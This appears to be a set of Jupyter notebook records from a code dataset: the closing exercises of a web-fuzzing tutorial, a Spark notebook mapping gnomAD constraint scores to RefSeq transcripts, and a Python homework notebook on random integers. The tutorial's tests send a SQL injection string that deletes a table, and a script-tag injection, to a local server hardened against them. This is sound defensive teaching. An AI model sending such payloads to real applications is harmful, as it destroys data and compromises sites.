Runner\nfrom Grammars import Grammar, Expansion\nfrom GrammarFuzzer import GrammarFuzzer, DerivationTree", "_____no_output_____" ], [ "# ignore\ndisplay_class_hierarchy([WebFormFuzzer, SQLInjectionFuzzer, WebRunner,\n HTMLGrammarMiner, SQLInjectionGrammarMiner],\n public_methods=[\n Fuzzer.__init__,\n Fuzzer.fuzz,\n Fuzzer.run,\n Fuzzer.runs,\n Runner.__init__,\n Runner.run,\n WebRunner.__init__,\n WebRunner.run,\n GrammarFuzzer.__init__,\n GrammarFuzzer.fuzz,\n GrammarFuzzer.fuzz_tree,\n WebFormFuzzer.__init__,\n SQLInjectionFuzzer.__init__,\n HTMLGrammarMiner.__init__,\n SQLInjectionGrammarMiner.__init__,\n ],\n types={\n 'DerivationTree': DerivationTree,\n 'Expansion': Expansion,\n 'Grammar': Grammar\n },\n project='fuzzingbook')", "_____no_output_____" ] ], [ [ "## Lessons Learned\n\n* User Interfaces (in the Web and elsewhere) should be tested with _expected_ and _unexpected_ values.\n* One can _mine grammars from user interfaces_, allowing for their widespread testing.\n* Consequent _sanitizing_ of inputs prevents common attacks such as code and SQL injection.\n* Do not attempt to write a Web server yourself, as you are likely to repeat all the mistakes of others.", "_____no_output_____" ], [ "We're done, so we can clean up:", "_____no_output_____" ] ], [ [ "clear_httpd_messages()", "_____no_output_____" ], [ "httpd_process.terminate()", "_____no_output_____" ] ], [ [ "## Next Steps\n\nFrom here, the next step is [GUI Fuzzing](GUIFuzzer.ipynb), going from HTML- and Web-based user interfaces to generic user interfaces (including JavaScript 
and mobile user interfaces).\n\nIf you are interested in security testing, do not miss our [chapter on information flow](InformationFlow.ipynb), showing how to systematically detect information leaks; this also addresses the issue of SQL Injection attacks.", "_____no_output_____" ], [ "## Background\n\nThe [Wikipedia pages on Web application security](https://en.wikipedia.org/wiki/Web_application_security) are a mandatory read for anyone building, maintaining, or testing Web applications. In 2012, cross-site scripting and SQL injection, as discussed in this chapter, made up more than 50% of Web application vulnerabilities.\n\nThe [Wikipedia page on penetration testing](https://en.wikipedia.org/wiki/Penetration_test) provides a comprehensive overview on the history of penetration testing, as well as collections of vulnerabilities.\n\nThe [OWASP Zed Attack Proxy Project](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) (ZAP) is an open source Web site security scanner including several of the features discussed above, and many many more.", "_____no_output_____" ], [ "## Exercises", "_____no_output_____" ], [ "### Exercise 1: Fix the Server\n\nCreate a `BetterHTTPRequestHandler` class that fixes the several issues of `SimpleHTTPRequestHandler`:", "_____no_output_____" ], [ "#### Part 1: Silent Failures\n\nSet up the server such that it does not reveal internal information – in particular, tracebacks and HTTP status codes.", "_____no_output_____" ], [ "**Solution.** We define a better message that does not reveal tracebacks:", "_____no_output_____" ] ], [ [ "BETTER_HTML_INTERNAL_SERVER_ERROR = \\\n HTML_INTERNAL_SERVER_ERROR.replace(\"<pre>{error_message}</pre>\", \"\")", "_____no_output_____" ], [ "HTML(BETTER_HTML_INTERNAL_SERVER_ERROR)", "_____no_output_____" ] ], [ [ "We have the `internal_server_error()` message return `HTTPStatus.OK` to make it harder for machines to find out something went wrong:", "_____no_output_____" ] ], [ [ "class BetterHTTPRequestHandler(SimpleHTTPRequestHandler):\n def internal_server_error(self):\n # Note: No INTERNAL_SERVER_ERROR status\n self.send_response(HTTPStatus.OK, \"Internal Error\")\n\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n exc = traceback.format_exc()\n self.log_message(\"%s\", exc.strip())\n\n # No traceback or other information\n message = BETTER_HTML_INTERNAL_SERVER_ERROR\n self.wfile.write(message.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "#### Part 2: Sanitized HTML\n\nSet up the server such that it is not vulnerable against HTML and JavaScript injection attacks, notably by using methods such as `html.escape()` to escape special characters when showing them.", "_____no_output_____" ] ], [ [ "import html", "_____no_output_____" ] ], [ [ "**Solution.** We pass all values read through `html.escape()` before showing them on the screen; this will properly encode `<`, `&`, and `>` characters.", "_____no_output_____" ] ], [ [ "class BetterHTTPRequestHandler(BetterHTTPRequestHandler):\n def send_order_received(self, values):\n sanitized_values = {}\n for field in values:\n sanitized_values[field] = html.escape(values[field])\n sanitized_values[\"item_name\"] = html.escape(\n FUZZINGBOOK_SWAG[values[\"item\"]])\n\n confirmation = HTML_ORDER_RECEIVED.format(\n **sanitized_values).encode(\"utf8\")\n\n self.send_response(HTTPStatus.OK, \"Order received\")\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(confirmation)", "_____no_output_____" ] ], [ [ "#### 
Part 3: Sanitized SQL\n\nSet up the server such that it is not vulnerable against SQL injection attacks, notably by using _SQL parameter substitution._", "_____no_output_____" ], [ "**Solution.** We use SQL parameter substitution to avoid interpretation of inputs as SQL commands. Also, we use `execute()` rather than `executescript()` to avoid processing of multiple commands.", "_____no_output_____" ] ], [ [ "class BetterHTTPRequestHandler(BetterHTTPRequestHandler):\n def store_order(self, values):\n db = sqlite3.connect(ORDERS_DB)\n db.execute(\"INSERT INTO orders VALUES (?, ?, ?, ?, ?)\",\n (values['item'], values['name'], values['email'], values['city'], values['zip']))\n db.commit()", "_____no_output_____" ] ], [ [ "One could also argue not to save \"dangerous\" characters in the first place. But then, there might always be names or addresses with special characters which all need to be handled.", "_____no_output_____" ], [ "#### Part 4: A Robust Server\n\nSet up the server such that it does not crash with invalid or missing fields.", "_____no_output_____" ], [ "**Solution.** We set up a simple check at the beginning of `handle_order()` that checks whether all required fields are present. If not, we return to the order form.", "_____no_output_____" ] ], [ [ "class BetterHTTPRequestHandler(BetterHTTPRequestHandler):\n REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']\n\n def handle_order(self):\n values = self.get_field_values()\n for required_field in self.REQUIRED_FIELDS:\n if required_field not in values:\n self.send_order_form()\n return\n\n self.store_order(values)\n self.send_order_received(values)", "_____no_output_____" ] ], [ [ "This could easily be extended to check for valid (at least non-empty) values. Also, the order form should be pre-filled with the originally submitted values, and come with a helpful error message.", "_____no_output_____" ], [ "#### Part 5: Test it!\n\nTest your improved server whether your measures have been successful.", "_____no_output_____" ], [ "**Solution.** Here we go:", "_____no_output_____" ] ], [ [ "httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler)", "_____no_output_____" ], [ "print_url(httpd_url)", "_____no_output_____" ], [ "print_httpd_messages()", "_____no_output_____" ] ], [ [ "We test standard behavior:", "_____no_output_____" ] ], [ [ "standard_order = \"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\"\ncontents = webbrowser(httpd_url + standard_order)\nHTML(contents)", "_____no_output_____" ], [ "assert contents.find(\"Thank you\") > 0", "_____no_output_____" ] ], [ [ "We test for incomplete URLs:", "_____no_output_____" ] ], [ [ "bad_order = \"/order?item=\"\ncontents = webbrowser(httpd_url + bad_order)\nHTML(contents)", "_____no_output_____" ], [ "assert contents.find(\"Order Form\") > 0", "_____no_output_____" ] ], [ [ "We test for HTML (and JavaScript) injection:", "_____no_output_____" ] ], [ [ "injection_order = \"/order?item=tshirt&name=Jane+Doe\" + cgi_encode(\"<script></script>\") + \\\n \"&email=doe%40example.com&city=Seattle&zip=98104\"\ncontents = webbrowser(httpd_url + injection_order)\nHTML(contents)", "_____no_output_____" ], [ "assert contents.find(\"Thank you\") > 0\nassert contents.find(\"<script>\") < 0\nassert contents.find(\"&lt;script&gt;\") > 0", "_____no_output_____" ] ], [ [ "We test for SQL injection:", "_____no_output_____" ] ], [ [ "sql_order = \"/order?item=tshirt&name=\" + \\\n cgi_encode(\"Robert', 'x', 'x', 'x'); DELETE FROM orders; --\") + \\\n 
\"&email=doe%40example.com&city=Seattle&zip=98104\"\ncontents = webbrowser(httpd_url + sql_order)\nHTML(contents)", "_____no_output_____" ] ], [ [ "(Okay, so obviously we can now handle the weirdest of names; still, Robert should consider changing his name...)", "_____no_output_____" ] ], [ [ "assert contents.find(\"DELETE FROM\") > 0\nassert not orders_db_is_empty()", "_____no_output_____" ] ], [ [ "That's it – we're done!", "_____no_output_____" ] ], [ [ "httpd_process.terminate()", "_____no_output_____" ], [ "if os.path.exists(ORDERS_DB):\n os.remove(ORDERS_DB)", "_____no_output_____" ] ], [ [ "### Exercise 2: Protect the Server\n\nAssume that it is not possible for you to alter the server code. Create a _filter_ that is run on all URLs before they are passed to the server.", "_____no_output_____" ], [ "#### Part 1: A Blacklisting Filter\n\nSet up a filter function `blacklist(url)` that returns `False` for URLs that should not reach the server. Check the URL for whether it contains HTML, JavaScript, or SQL fragments.", "_____no_output_____" ], [ "#### Part 2: A Whitelisting Filter\n\nSet up a filter function `whitelist(url)` that returns `True` for URLs that are allowed to reach the server. Check the URL for whether it conforms to expectations; use a [parser](Parser.ipynb) and a dedicated grammar for this purpose.", "_____no_output_____" ], [ "**Solution.** Left to the reader.", "_____no_output_____" ], [ "### Exercise 3: Input Patterns\n\nTo fill out forms, fuzzers could be much smarter in how they generate input values. Starting with HTML 5, input fields can have a `pattern` attribute defining a _regular expression_ that an input value has to satisfy. A 5-digit ZIP code, for instance, could be defined by the pattern\n\n```html\n<input type=\"text\" pattern=\"[0-9][0-9][0-9][0-9][0-9]\">\n```\n\nExtract such patterns from the HTML page and convert them into equivalent grammar production rules, ensuring that only inputs satisfying the patterns are produced.", "_____no_output_____" ], [ "**Solution.** Left to the reader at this point.", "_____no_output_____" ], [ "### Exercise 4: Coverage-Driven Web Fuzzing\n\nCombine the above fuzzers with [coverage-driven](GrammarCoverageFuzzer.ipynb) and [search-based](SearchBasedFuzzer.ipynb) approaches to maximize feature and code coverage.", "_____no_output_____" ], [ "**Solution.** Left to the reader at this point.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], 
[ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1e05abede1eaabd2f74c1491adccd2a5afcb9b
59,861
ipynb
Jupyter Notebook
notebook/rnaStability_10.5.1_Step05_gnomAD_pLI.ipynb
nch-igm/rna-stability
eea0e83aa4c745c36ea6f76684b33908af03e4d9
[ "BSD-3-Clause" ]
6
2019-07-06T19:46:44.000Z
2021-06-02T15:29:33.000Z
notebook/rnaStability_10.5.1_Step05_gnomAD_pLI.ipynb
nch-igm/rna-stability
eea0e83aa4c745c36ea6f76684b33908af03e4d9
[ "BSD-3-Clause" ]
1
2019-08-15T15:44:26.000Z
2019-08-29T14:43:36.000Z
notebook/rnaStability_10.5.1_Step05_gnomAD_pLI.ipynb
nch-igm/rna-stability
eea0e83aa4c745c36ea6f76684b33908af03e4d9
[ "BSD-3-Clause" ]
null
null
null
32.322354
441
0.478341
[ [ [ "## Ensembl to RefSeq Mapping", "_____no_output_____" ], [ "The constraint table from gnomAD has duplicate gene ID's - in the example of TUBB3 one gene ID is missannotated. Given out analysis is by transcript, it is probably better to use the transcript table from gnomAD. Howver, gnomAD used ENSEMBL transcripts and we used RefSeq Transcripts. Can map the two through biomart:\n\nhttp://www.ensembl.org/biomart/martview/e81bf786e69482239d8e7799ec2c9e9e\n\n", "_____no_output_____" ] ], [ [ "import org.apache.spark.sql.{Row, SparkSession}\nimport org.apache.spark.sql.types._\nimport org.apache.spark.sql.functions._\nimport org.apache.spark.sql.expressions.Window", "_____no_output_____" ], [ "val customSchema = new StructType(Array(\n StructField(\"GeneID\",StringType,true),\n StructField(\"GeneIDVer\",StringType,true),\n StructField(\"TranscriptID\",StringType,true),\n StructField(\"TranscriptIDVer\",StringType,true),\n StructField(\"EnsemblGeneSymbol\",StringType,true),\n StructField(\"GeneType\",StringType,true),\n StructField(\"GENE\",StringType,true),\n StructField(\"RefSeq\",StringType,true),\n StructField(\"NCBIGeneID\",IntegerType,true)))", "_____no_output_____" ], [ "val df_ens2ref = (spark.read\n .format(\"csv\")\n .option(\"header\", \"true\")\n .option(\"delimiter\", \"\\t\")\n .option(\"nullValues\", \"\")\n .schema(customSchema)\n .load(\"s3://nch-igm-research-projects/rna_stability/peter/ensembl_2_refeq.txt\")\n )", "_____no_output_____" ], [ "df_ens2ref.printSchema", "_____no_output_____" ], [ "df_ens2ref.filter($\"GENE\" === \"TUBB3\").show", "_____no_output_____" ] ], [ [ "Double check there are no duplicates", "_____no_output_____" ] ], [ [ "val df_ref2ens = df_ens2ref.filter($\"RefSeq\".isNotNull).select(\"TranscriptID\",\"RefSeq\").sort($\"TranscriptID\").distinct", "_____no_output_____" ], [ "df_ref2ens.show", "_____no_output_____" ], [ "df_ref2ens.count", "_____no_output_____" ], [ "df_ref2ens.select($\"RefSeq\").distinct.count", "_____no_output_____" ], [ "df_ref2ens.groupBy($\"RefSeq\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ "## gnomAD lof metrics by transcript", "_____no_output_____" ], [ "We want to link the data to gnomAD constraint metrics (LOEUF and pLI):\n\nSupplemental Table describing data fields:\n\nhttps://static-content.springer.com/esm/art%3A10.1038%2Fs41586-020-2308-7/MediaObjects/41586_2020_2308_MOESM1_ESM.pdf\n\nSelect the following columns from the main file:\n\n* **gene**: Gene name\n* **gene_id**: Ensembl gene ID\n* **transcript**: Ensembl transcript ID (Gencode v19)\n* **obs_mis**: Number of observed missense variants in transcript\n* **exp_mis**: Number of expected missense variants in transcript\n* **oe_mis**: Observed over expected ratio for missense variants in transcript (obs_mis divided by exp_mis)\n* **obs_syn**: Number of observed synonymous variants in transcript\n* **exp_syn**: Number of expected synonymous variants in transcript\n* **oe_syn**: Observed over expected ratio for missense variants in transcript (obs_syn divided by exp_syn)\n\n* **p**: The estimated proportion of haplotypes with a pLoF variant. 
Defined as: 1 -sqrt(no_lofs / defined)\n* **pLI**: Probability of loss-of-function intolerance; probability that transcript falls into distribution of haploinsufficient genes (~9% o/e pLoF ratio; computed from gnomAD data)\n\n* **pRec**: Probability that transcript falls into distribution of recessive genes (~46% o/e pLoF ratio; computed from gnomAD data)\n* **pNull**: Probability that transcript falls into distribution of unconstrained genes (~100% o/epLoF ratio; computed from gnomAD data)\n* **oe_lof_upper**: LOEUF: upper bound of 90% confidence interval for o/e ratio for pLoF variants (lower values indicate more constrained)\n* **oe_lof_upper_rank**: Transcript’s rank of LOEUF value compared to all transcripts (lower values indicate more constrained)\n* **oe_lof_upper_bin**: Decile bin of LOEUF for given transcript (lower values indicate more constrained)", "_____no_output_____" ] ], [ [ "val cols_constraint = Seq(\"gene\",\"gene_id\",\"transcript\",\"obs_mis\",\"exp_mis\",\"oe_mis\",\"obs_syn\",\"exp_syn\",\"oe_syn\",\n \"p\",\"pLI\",\"pRec\",\"pNull\",\"oe_lof_upper\",\"oe_lof_upper_rank\",\"oe_lof_upper_bin\")", "_____no_output_____" ], [ "val df_loft_import = (spark.read\n .format(\"csv\")\n .option(\"header\", \"true\")\n .option(\"delimiter\", \"\\t\")\n .option(\"inferSchema\", \"true\")\n .option(\"nullValues\", \"NA\")\n .option(\"nanValue=\", \"NA\")\n .load(\"s3://nch-igm-research-projects/rna_stability/peter/gnomad.v2.1.1.lof_metrics.by_transcript.txt\")\n .select(cols_constraint.map(col): _*)\n )", "_____no_output_____" ], [ "val df_loft = (df_loft_import.withColumn(\"p\",col(\"p\").cast(DoubleType))\n .withColumn(\"pLI\",col(\"pLI\").cast(DoubleType))\n .withColumn(\"pRec\",col(\"pRec\").cast(DoubleType))\n .withColumn(\"pNull\",col(\"pNull\").cast(DoubleType))\n .withColumn(\"oe_lof_upper\",col(\"oe_lof_upper\").cast(DoubleType))\n .withColumn(\"oe_lof_upper_rank\",col(\"oe_lof_upper_rank\").cast(IntegerType))\n .withColumn(\"oe_lof_upper_bin\",col(\"oe_lof_upper_bin\").cast(IntegerType))\n .withColumnRenamed(\"gene\", \"gnomadGeneSymbol\")\n .withColumnRenamed(\"gene_id\", \"gnomadGeneID\")\n .withColumnRenamed(\"transcript\", \"TranscriptID\") \n ) \ndf_loft.printSchema", "_____no_output_____" ], [ "df_loft.filter($\"gene\" === \"TUBB3\").show", "_____no_output_____" ] ], [ [ "Lets check that TranscriptID is not duplicated", "_____no_output_____" ] ], [ [ "df_loft.select($\"TranscriptID\").distinct.count", "_____no_output_____" ], [ "df_loft.count", "_____no_output_____" ], [ "df_loft.filter($\"p\".isNotNull && $\"pLI\" < 0.9).\n select(\"gnomadGeneSymbol\",\"p\",\"pLI\",\"oe_lof_upper\",\"oe_lof_upper_rank\",\"oe_lof_upper_bin\").sort($\"pLI\".desc).show", "_____no_output_____" ] ], [ [ "## Join gnomAD lof table to RefSeq to Ensembl table", "_____no_output_____" ] ], [ [ "val df_loft_ref = (df_loft.as(\"df_loft\")\n .join(df_ref2ens.as(\"df_ref2ens\"), $\"df_loft.TranscriptID\" === $\"df_ref2ens.TranscriptID\", \"inner\")\n .drop($\"df_ref2ens.TranscriptID\"))", "_____no_output_____" ] ], [ [ "Note that the number of rows has now increased from 80,950 to 95,806 - this is becuase ensemble transcripts can map to multiple RefSeq transcripts and vice versa. We now need to make a table where the RefSeq field is not duplicated.", "_____no_output_____" ] ], [ [ "df_loft_ref.groupBy($\"RefSeq\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ "For duplicate RefSeq's we will choose the value with the highest pLI value (i.e. 
most contrained) and where pLI is the same lowest oef rank (i.e. most constrained).", "_____no_output_____" ] ], [ [ "df_loft_ref.filter($\"RefSeq\" === \"NM_206955\" || $\"RefSeq\" === \"NM_145021\").show", "_____no_output_____" ], [ "val df_high_pLI = df_loft_ref.groupBy($\"RefSeq\").agg(max($\"pLI\"), min($\"oe_lof_upper_rank\"))", "_____no_output_____" ], [ "df_high_pLI.filter($\"RefSeq\" === \"NM_206955\" || $\"RefSeq\" === \"NM_145021\").show", "_____no_output_____" ] ], [ [ "Finally, create a table with unique RefSeq by joining to high pLI table", "_____no_output_____" ] ], [ [ "val df_loft_ref_uniq = ( df_loft_ref.join(df_high_pLI.as(\"pli\"),\n df_loft_ref(\"RefSeq\") === df_high_pLI(\"RefSeq\") && \n df_loft_ref(\"pLI\") === df_high_pLI(\"max(pLI)\") &&\n df_loft_ref(\"oe_lof_upper_rank\") === df_high_pLI(\"min(oe_lof_upper_rank)\"),\n \"inner\")\n .drop($\"pli.RefSeq\").drop($\"pli.max(pLI)\").drop($\"pli.min(oe_lof_upper_rank)\") )", "_____no_output_____" ], [ "df_loft_ref_uniq.groupBy($\"RefSeq\").count.sort($\"count\".desc).show", "_____no_output_____" ], [ "df_loft_ref_uniq.orderBy(rand()).limit(10).show", "_____no_output_____" ] ], [ [ "Constrained genes are those with a pLi > 0.9", "_____no_output_____" ] ], [ [ "df_loft_ref_uniq.filter($\"pLi\" >= 0.9).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ "Probability that transcript falls into distribution of unconstrained genes", "_____no_output_____" ] ], [ [ "df_loft_ref_uniq.filter($\"pNull\" <= 0.05).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ], [ "df_loft_ref_uniq.filter($\"pNull\" > 0.05).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ " Probability that transcript falls into distribution of recessive genes (~46% o/e pLoF ratio; computed from gnomAD data)", "_____no_output_____" ] ], [ [ "df_loft_ref_uniq.filter($\"pRec\" <= 0.05).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ], [ "df_loft_ref_uniq.filter($\"pRec\" > 0.05).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ "### Write out gnomAD pLI with RefSeq Metrics", "_____no_output_____" ] ], [ [ "(df_loft_ref_uniq.write.mode(\"overwrite\")\n .parquet(\"s3://nch-igm-research-projects/rna_stability/peter/gnomAD_pLI_RefSeq.parquet\"))", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1e0d5793910aa8539226b81d3a8381693f86f8
13,756
ipynb
Jupyter Notebook
chapter2/homework/localization/4-5/201611680168.ipynb
hpishacker/python_tutorial
9005f0db9dae10bdc1d1c3e9e5cf2268036cd5bd
[ "MIT" ]
76
2017-09-26T01:07:26.000Z
2021-02-23T03:06:25.000Z
chapter2/homework/localization/4-5/201611680168.ipynb
hpishacker/python_tutorial
9005f0db9dae10bdc1d1c3e9e5cf2268036cd5bd
[ "MIT" ]
5
2017-12-10T08:40:11.000Z
2020-01-10T03:39:21.000Z
chapter2/homework/localization/4-5/201611680168.ipynb
hacker-14/python_tutorial
4a110b12aaab1313ded253f5207ff263d85e1b56
[ "MIT" ]
112
2017-09-26T01:07:30.000Z
2021-11-25T19:46:51.000Z
26.814815
106
0.304958
[ [ [ "练习 1:求n个随机整数均值的平方根,整数范围在m与k之间。", "_____no_output_____" ] ], [ [ "import random, math\n\ndef test():\n i = 0\n total = 0\n average = 0\n number = random.randint(m, k)\n \n while i < n:\n i += 1\n total += number\n number = random.randint(m, k)\n print('随机数是:', number)\n average = int(total/n)\n \n return math.sqrt(average)\n \n#主程序\nm=int(input('请输入一个整数下限:'))\nk=int(input('请输入一个整数上限:'))\nn=int(input('随机整数的个数是:'))\ntest()", "请输入一个整数下限:3\n请输入一个整数上限:7\n随机整数的个数是:2\n随机数是: 4\n随机数是: 5\n" ] ], [ [ "练习 2:写函数,共n个随机整数,整数范围在m与k之间,(n,m,k由用户输入)。求1:西格玛log(随机整数),2:西格玛1/log(随机整数)", "_____no_output_____" ] ], [ [ "import random, math\n\ndef test1():\n i = 0\n total = 0\n number = random.randint(m,k)\n result = math.log10(number)\n \n while i < n:\n i += 1\n number = random.randint(m,k)\n print('执行1的随机整数是:', number)\n result += math.log10(number)\n \n return result \n \n \ndef test2():\n i = 0\n total = 0\n number = random.randint(m,k)\n result = 1/(math.log10(number))\n \n while i < n:\n i += 1\n number = random.randint(m,k)\n print('执行2的随机整数是:', number)\n result += 1/(math.log10(number))\n \n return result \n \n#主程序\nn = int(input('随机整数的个数是:'))\nm = int(input('请输入一个整数下限:'))\nk = int(input('请输入一个整数上限:'))\n\nprint()\nprint('执行1的结果是:', test1())\nprint()\nprint('执行2的结果是:', test2())", "随机整数的个数是:2\n请输入一个整数下限:1\n请输入一个整数上限:100\n\n执行1的随机整数是: 18\n执行1的随机整数是: 